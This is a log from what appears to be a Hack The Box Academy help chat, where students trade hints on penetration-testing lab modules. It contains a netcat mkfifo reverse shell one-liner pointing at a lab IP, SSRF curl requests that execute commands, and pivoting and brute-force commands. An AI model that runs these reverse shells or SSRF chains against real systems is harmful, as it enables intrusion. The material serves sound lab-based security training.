In attackng web apps with ffuf>DNS Records, it describes setting academy.htb to the ip in etc/hosts, but then it goes on to say that we now get the same web site with academy.htb that we got with the IP, so it seems to conclude that this proves that academy.htb is the same domain we've been testing. But we set the IP in hosts. How does this prove it?

https://academy.hackthebox.com/module/54/section/499

Do not be sad.
If you ask your question here in the chat, I am almost sure you will get appropriate help.

iam sad because got mad not solved , and dont know what is the problem

Sorry, I don't quite understand the question.
But a domain is not equal to IP address.
If you put an IP address and a domain in your hosts file, then your PC will be able to resolve the doamin.

What module, section, and question are you on?

My question is that I don't understand what the section is trying to outline. It seems to be making the case, after we set academy.htb to an IP in hosts and accessing academy.htb, that this proves that academy.htb is the same domain we have been testing so far

However, we get the same website we got when we visit the IP directly, so academy.htb is the same domain we have been testing so far. We can verify that by visiting /blog/index.php, and see that we can access the page.

It may be that the web server is configured to serve the same website on the IP address as when you make the request via domain.
But this does not have to be the case.
You can run multiple websites on one IP address (VHOST).

I understand VHOSTs, but I don't understand the section and what it is trying to say. Is it related to vhosts? It doesn't talk about them at all

The section tries to explain why you need DNS.
In the module, the web server is obviously configured to serve the same website via IP and via domain.

And how did we determine that the IP is the same domain as academy.htb?

when we set the IP to academy.htb in hosts

The message "admin panel has moved to academy.htb" was displayed in a previous section

An IP is not a domain.

ok, I still don't understand what that section is trying to convey

That is the verbage from the section

It's just a matter of understanding that IP is not the same as domain and how a domain is resolved.

bro for the fuff just need to add any and all vhost to the /etc/hosts file for the IP. it will save you alot of time

Then how do we reach the conclusion that they are the same?

ffuf*

I'm asking about the DNS Records section

https://academy.hackthebox.com/module/54/section/499

I don't understand how they reached the conclusion they did

Because in this case they are identical.
The web server delivers the same website with http://10.10.10.10 as with http://hackthebox.htb.

heres a little experiment for ya: change the /etc/hosts line to notarealdomain.com and tell me what happens when you browse it.

Cause it very well could be that their example for what theyre trying to explain is bad, but this test will make it clearer if thats the case or not.

yes, I know that. Since WE set the academy.htb to an IP in hosts, then they are identical. Since we set it to be the same, how does that prove that they were always the same? That's what the section seems to say

no, do the experiment I said and please tell me what happens

how I answer your question depends on what kind of result you get back

ok, let me test

they may just be using a shitty example and if they are then my explanation wont make any sense

Anyone available to ask a question regarding Attacking Services - Hard Lab. Just completed but quite confused on a step as to why it works. Let me know

are you saying you are confused to why it works or if someone else is confused then ask you?

I am confused as to why the attack chain works when initial key element returns a value of 0 @analog tendon

I get the same result if it is academy.htb or blah.xyz if I set both to the same IP in hosts

then theyre using a lame example

the idea is that the server can be configured to serve a specified vhost, and it may serve a default one with just the IP address, but redirect to the proper stuff depending on which vhost it receives from a browser.

but in this case, the academy domain and the default page are the same, so you see no difference

the linked server part right?

I dont even think they are touching on vhosts yet. It's a couple of sections ahead. It seems like they are saying "we just proved academy.htb is the same as our test IP". The previous sections the php page had a message that the admin panel moved to academy.htb

yeah and those are still considered vhosts in the server configuration

Hello, Need help on FILE TRANSFER module. I created webdav server and can see that on local pc. But when connecting from powershell with dir \192.168.0.119\DavWWWRoot it says path not exist. Can anyone help?

@ripe grove basically just ignore it and move on

I will, I just wasn't sure if I was misunderstanding something. it seems the section just needs a rewrite

yeah the point they were trying to make isnt relevant for the lab

pretend that if you accessed the IP directly you got the apache default page and you didnt get the site until you added academy to etc/hosts

well that's the vhost section

well thanks all for confirming I wasn't crazy. I was very confused for a moment

could someone help me on file uploads - type transfer? I've got files uploaded but it's treated as an image not a webshell ||I was using one of the jpg MIME types and fuzzed for acceptable extensions, but haven't gotten anything to work||

Yes

I spent majority of time elsewhere because the value was 0. Eventually gave it a try and got the flag

if you need help with the commands, try this https://donsutherland.org/crib/imap

i may not be understanding it right but i put it in the same place as being a domain admin but within the database. as long as you can run as admin within the domain you can run files on other machines within the domain and since they're linked then its like they are their own domain. the thing that killed me on that one was the syntax. they didnt explain it too well and i had to look elsewhere to figure out how to put the syntax properly

u can dm if u want I have completed that module

Yes but impersonating said user returns a value of 0, which is false

That threw me off

on the linked server? or on the server you could access?

service I could access

It does not work w/o attempting to impersonate said user

thats because he wasnt an admin the server you could access. but if you were to bounce that same command after impersonating off the linked server he would have a value of 1

sorry run the command of the linked server. not bounced

I understood that as, I have to impersonate as that user from server I am on before going to linked server

i think on local server you were just supposed to see that you can impersonate J but then if you checked to see if J was a DBA on local it would be 0 but he was DBA on linked

I was expecting ```--------
user

(1 rows affected)

    ---->0 to be 1 ``` and I also checked it if he was sysadmin, never dbo.

Although, did see dbo by checking current user on linked server

oh well they were making it hard and confusing to just make it hard and confusing.

Yeah, after answering that question, who you can impersonate I did just that and saw 0

Hi guys, is this the correct channel regarding help with Starting Point labs?

and immediately scratched my head and started other attack vectors

no this is for modules in HTB academy

This is the correct channel -> #starting-point

thanks!

yea that stopped me up for a couple of hours. the other 4 hours was syntax issues

That last question lost me for good 4-5 hours lol

I went back to the beginning and re-enumerated everything

is anyone free for this?

I could not connect to db with sqsh to save my life

1 user needed a password change and user f*** was an incorrect password 🤷‍♂️

mssqclient worked just fine

Ill probably try to get a reverse shell instead of just reading flag another day

Sqsh is broken on pwnbox/parrot

i use it on ubuntu

which was broken

Oh

Then idk xD

These modules have taught me 1 important lesson so far and that is Try multiple versions of the same exact tool, using exact same syntax

Yeah

Like some things needing python 2.7 not 3

Evil-winrm/cme/impacket

Those are 3 Ive had issues with so far relating to versions

Since im on ubuntu I tend to keep my newer versions in /snap/ instead of /usr/bin

Did anyone else see an experimental interactive terminal pop up in academy? I checked it out...pretty freakin' cool! Way to go dev team!

Do you mean the PwnBox?

Yeah, it pops up when you start the pwnbox. I typically don't use the pwnbox and hadn't in a while, so I was a little surprised to see the addition of the integrated terminal. Its quite possible it isn't new but just new to me. Still, color me impressed. 🙂

can someone point me in the right direction i'm in the nmap module on the final lab, i've searched and found 2 ports open 22 and 80

but i'm unsure on how to proceed

Try scanning all ports

i did

-p-

Also try -sU

try out the nc

of the specific port

80 mb

i tried nc on both ports 22 and 80

oh

ok

waited for a while

try out curl /robots.txt

did it work?

port 20 just spat out SSH version

port 80 just spat out what curl would about the webpage/server

no flag

bro

curl http://ip/robots.txt

Also to bind to a port you need to run as root/sudo

wait

try out the --source-port 53 when scanning with nmap

--source-port

The question is asking the version of the service. The -sV flag does just that

no, it needs the flag

from shell

It's expecting something: but they're not finding the right port

yeah, that's the right one

i think the version is the flag if i remember right

there must be specific port

But also this lab specifically, is where the firewall evasion techniques come into play

using --source-port 53 in a new nmap scan

i've been on it so long the vm ran out of time and died lol

This is why it's recommended to run it on your own vm

xdd

how is it going now? xd

these mfs

hahah

port 50000

yeah

you just needed to add the source port

xd

i realised i was missing the source port because its specified that its used to basically trick the firewall or IDS/IPS

cool

would you like to become accountability buddies?

thanks for the help peeps

yeh man

thanks for this

anyone available and willing to help with the "attacking common services - DNS" ?

just added sudo and the correct port now i know it and got the flag

Just ask your question

ok

python3 subbrute.py inlanefreight.com -s /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r resolvers.txt

ive ran that and got a whole bunch of subdomains using "dig any"

and no flag to speak of

i dont get it

iirc that's the wrong wordlist

i think it was ||fierce||

you might be thinking of the tool you used

the wordlist thing is a different module entirely

Maybe... I don't have my exact notes on that module, but there was one DNS module that used the fierce wordlist instead of the subdomains one

it's an earlier module

ok i could try that

or maybe it was using the tool fierce?

but the says use subbrute so

dont need the tool

can just jack its word list

ahhh ok

pivoting module / skills assesment section
how you transfer files to/from ||172.16.5.35|| host. Files I want to transfer are too big to use base64 trick. It is impossible on my first pivot to setup any http server for the transfer. I tried port forwarding so ||172.16.5.35|| can reach my attack box through my pivot machine, but it doesnt work (used msfconsole portfwd maybe i should try chisel). scp doesnt work either. any ideas?

Subd 20k worked fine

with xfreerdp you can mount a directory from your system to the rdp system; check the man page for xfreerdp to see the syntax

damn. thats concerning, seeing how ive tried that one

Honestly, double check your ports etc

ok, will do

can i have a nudge on passwords attack medium

Like I am confused where to start

I see SSH and SMB open on the box -- like do they want me to bruteforce again?

that module is all about different password attacks and brute forcing. Use what you've learned you're on the right track

if you need more help feel free to dm me

hey all. Dumb question but I was doing the Linux Fundamental module, Section Network Services. I figured out the type of services by ||runing cat on syslog.service||. I was wondering if you can look up this info with a systemctl command or such?

You start with SMB and do a lot of back and forth, by far the best module that has you practice all the things

Hi, im tring hack a machine but in my company there are a firewall and it is blocking mi conexion, somebody know how i can bypass it?

Ask the system administrator of your company. He can help you

okay

this page is for module related stuff...not semi illegal (grey area) etc. abit surprised you have asked this here!

ok again this is for Module related stuff,anyone withn an ounce of common sense will not illegally hack for you... go to the police and report it.

Hello is this group for helping with academy lab?

yes it is. Anything Academy module related.

I struggle with INFORMATION GATHERING - WEB EDITION part Active Subdomain Enumeration

Question : Find and submit the contents of the TXT record as the answer.

Should I do footprinting from the start as recommended?

i dont wanna report it

Brill.... may i suggest you then find a channel willing to help you. Because this isnt the place, it is for module related stuff.

I do not have my notes with me, hopefully someone will be able to answer it, but always go from the start, to get as much information.

... if you haven't even tried, no point in looking for guidance. Always try what you know first before looking for guidance

Can any one give me a hint on Attacking Common Services, Attacking SQL Databases? I have the users password but cant log in with it. I have tried all of the other suggested attacks in the module; not sure what to do next?

MSSQL iirc

Hello, can somebody help ke wirh weh attacks skills assessment module, I get what admin username is, but don't know how tk change his password, it says to me Access Denied. I was trying HTTP verb tampering and to change uid, propably problem in token, but I can't decipher it. Could someone DM me for help? Thanks in advance

Yes.

does any one have microsoft 365 license key

This isn't the place to ask for that, also as O365 is a sub based service-based on account someone just having a key is just silly. Especially if you get that key, they'll still be able to tamper with your account

Any "key" is going to be a cracked key and illegal :)

oh thnkx for the info

Question for ** Windows Priv Esc PILLAGING** - Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer. - Could someone point me in the right direction, Im running user Jeff as admin and still access denied with get the backup.

do zonetransfer

You can copy and paste files within an RDP session using both mstsc and xfreerdp. That's probably the easiest option, though I strongly recommend getting familiar with other terminal-based file transfer methods. If you haven't already, you should definitely check out the File Transfers module - its very well done:
https://academy.hackthebox.com/course/preview/file-transfers

I'm doing the Hacking Wordpress skills assessment, but my API keys from the DB are not working, thus can't find more info about the vulnerable plugin. I know what the plugin is, but not sure which exploit to use, can someone confirm if it's the same one from the instruction's example : wp_admin_shell_upload

the api key from wpscan?

hm

Yeah, it does not seem to work, I made 2 accounts already

what flag are you using in wpscan to declare the key?

--api-token

Be sure to ||turn off the AV||.

Hello,

module getting started, knowledge check page.

I want to ||upload a shell, how do you make flash work?||

Thank you.

define "flash work"

a button uses swf to launch a form, that can upload stuff.

are you sure that this is the correct way?

<object id="SWFUpload_0" type="application/x-shockwave-flash" data="template/js/uploadify/uploadify.swf?preventswfcaching=1678962077688" class="swfupload flpl_initiated" style="position: absolute; z-index: 1;" width="100%" height="25"></object>

I am sure it is A correct way.

Source: https://attackdefense.com/challengedetailsnoauth?cid=14

look at the hint and think about your approach

thank you, I may have to curl my enthusiasm

Thx for answer. I did that module. Tried various methods. Maybe my port forwarding sucks.

Because windows host is connected to the first Linux machine I setup on my first pivot
portfwd add -R -l 80 -p 80 -L <IPaddressofAttackBox>

Of course I didn't forget to run autoroute and socks in msf.

With the port redirection I should be able to download files on windows from my attack box wget http://PIVOT_IP_ADDR/script
I understand this should connect to Linux machine on port 80, some magic will be done and ultimately my own host will receive GET request. But it doesnt

Hmm, really stuck on the question: 'Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.' in 'Hacking WORDPRESS' -- Can someone give me a hint, whether I need to use metasploit somehow, or can I somehow get the answer from the vulnerability I found containing word: ajax

I can open the file /etc/passwd, but that does not seem to help me at all

Read the question correctly. "Use a vulnerable plugin"
A shell is of absolutely no use to you here 😉

Look at all installed plugins and search with the search engine of your choice for <plugin name> and unauthenticated file download.

Thanks, I'll give it a shot

Got it, thank you! Was looking at the wrong vulnerable plugin at first :>

Copy and paste never focking work in browsers pwnbox

you can use the copy-paste box that is integrated into pwnbox

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

How am I supposed to do this? Aint regexes and tens of pipes a bit too hard for an easy module? Tbh, I hate to manually write things like that for free, it takes a lot of time and debugging and I will still forget it tomorrow

you can literally use the commands from the examples

plus the ones from the cheatsheet

What example command? I have only one usage of curl on that page and its in the question

Hi everyone
AD Enumeration Skill Assessment Part 2
Im trying to locate the configuration file containing the MSSQL String

i accessed the Department Share (via smbclient) with the User A... But every folder is empty.

i then tried to spider the complete 172.16.7.3 with
crackmapexec smb 172.16.7.3 -u A***** -p ***** -M spider_plus -o READ_ONLY=False

but the spider_plus doesnt finish. i always get a timeout error.

can anyone give me a hint, if im on the right track with the smb share and with the syntax of the spider

ty

There is basically an entire linux in cheatsheet lol, I don't know a single person that remembers all that awk can do

if are not willing to remember tools then you should reconsider your skill/job path

as it is a crucial thing

You can ask about it guys like team leaders in google security, I can give you dc to some, they won't remember this shit too

if only you spent that energy into trying by yourself rather than complaining, you should have finished the exercise

I can't think anymore when i'm angry and frustrated, now I can only complain

find the solution to that problem

don't paste such stuff, check for white spaces or reach out to support

Hey guys, broken auth assesment here,

Anyone knows a wordlist for roles? I've been trying to get it for a day now.

Got user enum, got em cracked with rockyou and cracked the cookie.

I'm stuck in the pivot skill assessement. Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer. I found credentials for ||mlefay|| but i'm not able to login anywhere. I also tried to ping sweep on the webshell via for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done but i keep getting ping: 172.16.5.{1..254}: Name or service not known. Could use some help.

I did that with msf ping_sweep. If nth responds restart machine

Alternatively u can run through proxy Nmap and scan entire network for ssh & rdp. But it will take forerver

Can I DM you? I seem to be missing some steps, but i can't identify which.

$ curl -s https://www.inlanefreight.com | grep  -oiE "www.inlanefreight.com/*[^'\"\ \?\\t\%]+/" | sort -u 
www.inlanefreight.com/index.php/
www.inlanefreight.com/index.php/career/
www.inlanefreight.com/index.php/feed/
www.inlanefreight.com/index.php/news/
www.inlanefreight.com/index.php/offices/
www.inlanefreight.com/index.php/wp-json/
www.inlanefreight.com/index.php/wp-json/oembed/1.0/
www.inlanefreight.com/index.php/wp-json/wp/v2/pages/
www.inlanefreight.com/wp-includes/
www.inlanefreight.com/wp-includes/css/
www.inlanefreight.com/wp-includes/js/
www.inlanefreight.com/wp-includes/js/jquery/

Still wrong answer though, things like that are often a lot harder than it looks, cause you have to kinda guess what the creator considers as a valid path, or what can slip under your filter, certainly it shouldn't be rated ez imo, there are security ppl who don't know linux or terminals at all or just starting.

No worries, glad to help. Have you done the pivot skill assessment already by any chance?

😢

any help please for skill assesment sqlmap essentiaals i got the exact compelete flag but said incorrect

😦

no miss space its clearly same

Please help on Linux privesc skills assessment in getting the flag1.txt i see the history of htb-student but the flag1 is absent in /var/www/html. What am I doing wrong? thanks in advance

Could i DM someone about Attacking Common Services - Attacking DNS? I'm stuck and idk what else to do :/

**Could i dm for this please **, spent 24 hours

anyone able to give me a hint for protected files question in the module password attacks? SSH brute force is taking forever...

Hello guys. I'm struggling to get the final awnser from Credential Hunting in Windows. The hint is talking about Ansible... Can anyone give me some tips? 🙂

What are the credentials to access the Edge-Router? (Format: username:password, Case-Sensitive) - Question

i dont why

sqlmap essentialss

really sucks

Nah man it’s cool!

I think SQLMap has been one of my favorite modules. I learned a ton of new features/options I didn’t know existed

could i dm you?

Id create an account with wordpress and get a free api-key you can use for your scans. Gives a lot more information🤷‍♂️

It may not be needed but doesnt hurt

Hello can i ask question regarding Attacking common services hard?
I found that there is one smbshares that i can access but when I try the smbmap it gives me authentication error..

nvm

figured out

sure

try smbclient

ty

socks5 tunneling wth chisel: I cant execute chisel on pivot host because some libaries are missing how do i fix that

Use 1.6.0

That module is an absolute mess.

@rustic sage yeah that worked thanks! Saved me a lot of time

can anyone help me with Attacking common service hard? I will dm for specific question

That one is also terrible. What do you need?

can i dm you?

No worries, you'll probably hit some more crap ||with the ptunnel-ng BS||, like i said the module is a mess.

Sure.

can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. I think I found the MSSQL Password but when I enter it I get an error saying that it could not connect

you can dm me

Anyone else having issues RDP'ing into the Windows machine on the 'Introduction to Active Directory' module for the 'Guided Lab' sections at the end? I can RDP into the Windows machines in the 'Windows Fundamentals' module just fine. When I do the former, an xfreerdp window appears but it remains blank and then the connection closes with error message of 'ERRINFO_LOGOFF_BY_USER'

anyone here finish the medium lab for password attacks? Need a nudge

coudl someone help me with file upload skill assessment? I know what I have to do, but I'm struggling to achieve it

you can dm me

I'm not familiar with that error, but with AD modules it's best to give it 5 minutes to fully boot before trying to RDP in.

You can dm me if you still need help

Anyone want a study partner for Academy with goal of getting CPTS?

I am working on the Nibbles practice box and I have a question about the reverse shell used in the course to gain root. I cant find much information or where the shell came from, but why is this one used: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f

feel free to DM if someone can help me understand 🙂

I feel so dumb... Im on windows fundamentals cause I want to do all modules, but idk what I need to put as version in second task on page 1... I got version with PS with Get-WmiObject, from registry key ProductType, from system info, full name, shortcut, number, all bad. this question: Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive) whats a format of an answer for the validator?

well, I havnt done it there but the question says it. Windows X and its case sensitive

I tried all cobinations already 😄 It drives me nuts 😄

why would you try all combinations and not the correct one

take care of spaces n such too

cause correct one is validated as wrong 😭 I'll come back to it, thanks

It almost most certainly isnt

lmao, facepalm, I am dumb, lol

I thought it wants a whole name

thanks

not module/academy relevant

Fair enough

I can give you a nudge, but I don't remember what wordlists I used

generally for that module you use either the mutated list, the unmutated list, and rockyou

^^

Ok ! Ill try the rockyou.

could I DM someone about file upload skill assessment? ||my shell is uploading, but I still get a 404 when navigating||

Can i have a sanity check for "HTTP Response Splitting" in module: "HTTP ATTACKS " ? In particular about 'admin report' functionality, it doesn't work even with basic redirection

What's this awesome thing academy just added 👀 🔥
https://academy.hackthebox.com/my-badges

have you tried cyberchef or burpsuite?

copy the url to cyberchef and choose the settings for it

at least im 99% sure cyberchef does url decoding, quick google search will give you the results

sure

DM if you are still stuck

Hello, I'm having an issue with the in browser instance and getting to the target. I've tried googling, and looking through some of the support post. Sorry if this is the wrong place to ask, I started yesterday. Can someone point me in the right direction?

hey my friend had similar issue try respawning target in the academy page , make sure your VM is configured / SSH

Thank you for the suggestion. That could be my issue, I was under the impression for the in browser instances, I didn't have to configure anything. I'm on the academy side of things if that makes any difference.

hey does anyone know how to install proxychains or anon surf on kali for some reason i dont know why it is not working used it a million times and now all the sudden it is not working

The badges look really cool. 🔥🤩

Is there any way to output the badges with the real name? Like with the Student Transcript?

I want to flex all the modules ive done 🥲

Like it would be cool to show completed academy stuff on main HTB platform

Can someone help? 🙂

If you enumerated and went through everything you'll have it

Should I use some resources from the previous subjects?

Everything you need should be in the module iirc

Can I send u a DM?

When I first completed the assessment I used SSH Dynamic Port Forwarding to chain proxies, then went back and did the same with chisel. Been trying to avoid using metasploit though I may go back through and try that as well.

Not at my computer

I can't understand what a personal machine instance is, can someone explain it to me?

anyone online?

Hard to say without the exact context. They are probably referring to a machine instance that is provided only for you (no other HTB users are sharing the instance so you won't have to contend with anyone else while attacking the machine, come across files/exploits they have left around, or deal with changes they've made to the box while exploiting it). Its also possible that they are referring to your own Attackbox rather than the Pwnbox. For instance, if you use VirtualBox with a Kali/Parrot VM, or VMware with a Kali/Parrot VM, etc.

I understand, thank you.

Can anyone help me out, I'm having difficulty finding the targets hostname while doing an NMAP scan

What module are you in?

Module 19, I'm looking everywhere for a NMAP command that will specify a targets hostname

I don't know which one 19 is, but you can try --packet-trace and see if its returned in the communication. Or you may have to enumerate one of the services that are detected in the scan.

Enumerate the hostname of your target and submit it as the answer.

this is what it's wanting me to do

What is the command you are running?

I'm trying a few things

I'm running -A now

Performs OS Detection, Service Detection, and traceroute scans.

🤷‍♂️

Is this the Network Enumeration with Nmap module?

holy shit I found it

nmap -A did the trick

thanks for the help though for sure

Np, did you try -sV -sC or -O before that?

**#command injection

• 1 Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

the answer is : 25 why its wrong?**

Because the first bits of lines aren't the html code

how could i do for that ?

Look where the "<!--Doctype" starts or for <html>

You do have the code but the first 21ish lines looks like that's just your proxy request

****i havent seen result
#Command injection

• 1 Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?

what's up hackers

Module: Server Side Attacks Section: SSRF Exploitation Example

Can someone provide a nudge on the command for accessing the root directory? I thought I was in the root directory already via:
curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"

curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=dir"
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 139
Server: Werkzeug/2.0.2 Python/3.8.12
Date: Thu, 16 Mar 2023 19:15:39 GMT

<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=dir</h1><a>index.html internal.py internal_local.py start.sh
</a></body></html>

10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=<Not sure of command?>

if you can run commands maybe try for a reverse shell?

When I encode the characters for the command, I get the following message:

"URL can't contain control characters."

what are you using to repeat burp?

Try something like ....// For directory traversal

Yes. I was using burp even though there wasn't mention of it for this section of the module. The question, "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." recommended to use the rce script. That script also returns the following error when I attempt:

"bash: syntax error near unexpected token `>'"

I think I am doing something wrong.

In the Password Mutations section of password attacks module. I am trying to use hydra to bruteforce the ssh creds. For the life of me I can't get hydra to work. Any thoughts? I've tried explicitly specifying the username, and then trying a username.list file, nothing seems to stick.

argh... disregard.. using the -p instead of -P for password list :S

leaving it for anyone who falls into the same trap.

Question about basics. I'm doing the "getting started" module. In the questions it states that you spawn the target. Goal is to do a NMAP scan on the the target. So do I scan the VM I spawned or is there a target in the VM network i should scan.
So scan the local machine or scan some other IP that I should locate?
Bit confused because on previous question the version of VM's SSH banner was newer than the answer of the question.

Working on the Secure Coding 101: Javascript module and stuck on #4 in the assessment (/Reverse). Anybody have tips/tricks or help they can give? I have it unpacked and think I understand several of the pieces (the array, the inverted b64, the URL decoder). Just a bit lost on figuring out what to change. Been going at it for days now

There should be a separate target that you spawn. It will say "click here to spawn target" or something like that in bright green text right above the questions. So you spawn the target, then once it loads it provides an IP address for you to scan. hope that helps!

Module: Server Side Attacks
Section: SSRF Exploitation Example

I cannot locate the flag within the files rendered:

curl -i -s "http://10.129.189.132/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls%252520-lha%25250A%250A "
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 407
Server: Werkzeug/2.0.2 Python/3.8.12
Date: Fri, 17 Mar 2023 05:12:01 GMT

<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=ls -lha
</h1><a>total 24K
drwxr-xr-x 1 root root 4.0K Nov 1 2021 .
drwxr-xr-x 1 root root 4.0K Nov 1 2021 ..
-rw-r--r-- 1 root root 84 Oct 28 2021 index.html
-rw-r--r-- 1 root root 1.2K Oct 28 2021 internal.py
-rw-r--r-- 1 root root 655 Oct 28 2021 internal_local.py
-rwxr-xr-x 1 root root 69 Oct 28 2021 start.sh

Theres no flag in the above. Can someone dm me please?

dm me if u want

I'm having issues with the following module: Getting Started, and section Pentesting Basics (Public Exploits). I have tried nmap, wpscan, gobuster, searchsploited every installed wordpress plugin and even tried to run some of the found xmlrpc exploits with no luck. Can someone point me in the right direction and NOT provide the answer?

Search for plugin exploits

I already did. Found the following: xmlrpc and wp-cron,

Tried about all of the associated exploits related to xmlrpc and wp-cron with no luck

I forgot to mention simple backup for wordpress

you are half way there

pwned it

god damn simple backup plugin

damn it feels good

for Password attacks: attacking ad and ntds.dit
I am not able to get crackmapexec to work. I am using the following command and I get NO output as if the command is not even running. It also doesnt work with rockyou. And updating crackmapexec did not work. Pls send help

crackmapexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/rockyou.txt

--local-auth maybe?

will try, thanks

on top of that make sure that your wordlist is not compressed, e.g. rockyou.txt.tgz

Forget. I'm so blind. I tried to see the situation in the most complicated way... Ty for the tip 🙂

how do i hack blox fruits

i must be missing something....What is the name of the security regulation for credit card payments a company must adhere to...... I thought it was PCI or PCI DSS but it says I'm wrong.....what am I overlooking?

never mind...i needed the"-" in the answer

Hi, Need some hints
Module : Footprinting
Section: SMTP
Ques: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I'm using HTB client for this question, I have the footpriniting-wordlist.txt

smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.191.181 v
Getting all 101 payload noresult

msfconsole - I tried auxiliary(scanner/smtp/smtp_enum - No result